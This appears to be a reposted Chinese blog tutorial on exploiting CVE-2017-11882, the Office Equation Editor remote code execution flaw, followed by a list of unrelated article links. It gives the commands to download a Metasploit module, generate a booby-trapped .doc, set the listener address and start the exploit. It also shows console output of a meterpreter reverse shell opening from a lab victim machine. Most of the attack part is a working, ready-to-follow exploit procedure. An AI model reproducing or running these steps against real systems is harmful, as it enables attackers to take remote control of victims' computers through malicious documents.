博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
cve-2017-11882漏洞利用
阅读量:7186 次
发布时间:2019-06-29

本文共 2900 字,大约阅读时间需要 9 分钟。

概述

这是一个潜伏了17年之久的远程代码执行漏洞,这个漏洞影响了目前所有的流行office软件,原理是利用了office的一个EQNEDT32.EXE组件,就是公式编辑器组件,详细的你可以看freebuf的这篇文章

我们现在说攻击

操作

首先下载metasploit的攻击模块

wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/39a4d193a17c6f85846a58a429c0914f542bded2/modules/exploits/windows/fileformat/office_ms17_11882.rb
之后移动到下面这个目录
mv office_ms17_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat
接着启动metasploit
输入
use exploit/windows/fileformat/office_ms17_11882

接着看一下设置选项

msf exploit(office_ms17_11882) > show optionsModule options (exploit/windows/fileformat/office_ms17_11882):   Name      Current Setting  Required  Description   ----      ---------------  --------  -----------   FILENAME                   yes       Filename to save as   SRVHOST   0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0   SRVPORT   8080             yes       The local port to listen on.   SSL       false            no        Negotiate SSL for incoming connections   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)   URIPATH                    no        The URI to use for this exploit (default is random)Payload options (windows/x64/meterpreter/reverse_tcp):   Name      Current Setting  Required  Description   ----      ---------------  --------  -----------   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)   LHOST                      yes       The listen address   LPORT     4444             yes       The listen portExploit target:   Id  Name   --  ----   0   Automatic

设置生成的文件名字

set filename bboysoul.doc
设置主机ip
set lhost 192.168.1.102
开始攻击
exploit

msf exploit(office_ms17_11882) > exploit[*] Exploit running as background job 0.[*] Started reverse TCP handler on 192.168.1.102:4444 [*] Using URL: http://0.0.0.0:8080/xudLp3[*] Local IP: http://192.168.1.102:8080/xudLp3[*] Server started.

之后当前目录下会生成一个叫bboysoul.doc的文件,我们在受害者机器下打开就好

注意我使用的是office201064位专业版,机器是windows764位
经过测试32位的windows和office是不能用的
接着在受害者机器打开这个文件就好了

msf exploit(office_ms17_11882) > [*] 192.168.1.113    office_ms17_11882 - Handling initial request from 192.168.1.113msf exploit(office_ms17_11882) > [*] 192.168.1.113    office_ms17_11882 - Stage two requested, sending...msf exploit(office_ms17_11882) > [*] Sending stage (205379 bytes) to 192.168.1.113[*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.113:49225) at 2017-11-25 05:31:10 -0500msf exploit(office_ms17_11882) > sessionsActive sessions===============  Id  Type                     Information                                 Connection  --  ----                     -----------                                 ----------  1   meterpreter x64/windows  WIN-HK90RUM6L1B\bboysoul @ WIN-HK90RUM6L1B  192.168.1.102:4444 -> 192.168.1.113:49225 (192.168.1.113)

欢迎关注Bboysoul的博客

Have Fun

转载地址:http://zgykm.baihongyu.com/

你可能感兴趣的文章
Node.js笔记 - 安装express
查看>>
zuul忽略表达式
查看>>
hybris安装B2B
查看>>
boot中 Quartz注入spring管理类失败
查看>>
性能,不是不重要,而是,它没有可维护性重要
查看>>
STP的作用和操作
查看>>
大话设计模式读书笔记4——模版方法模式
查看>>
access中求两表差集问题
查看>>
PYTHON2.Git
查看>>
OCP 11g认证052考试最新题库(带答案)-带38题
查看>>
模拟误删除InnoDB ibdata数据文件恢复
查看>>
9个offer,12家公司,35场面试,从微软到谷歌,应届计算机毕业生的2012求职之路(转)...
查看>>
asp.net core 2.2 根据PC端和移动端自动显示不同视图而不改变url地址
查看>>
LeetCode 341: Flatten Nested List Iterator
查看>>
easyui tabs页签显示在底部属性
查看>>
IIS7设置IP地址和域名限制
查看>>
Platforms/iPhoneSimulator.platform/Developer/usr/bin/g++-4.2 failed with exit code 1问题总结及解决方案...
查看>>
iOS,贝塞尔曲线(UIBezierPath)
查看>>
二维码生成类
查看>>
css 兼容性写法,CSS hack写法
查看>>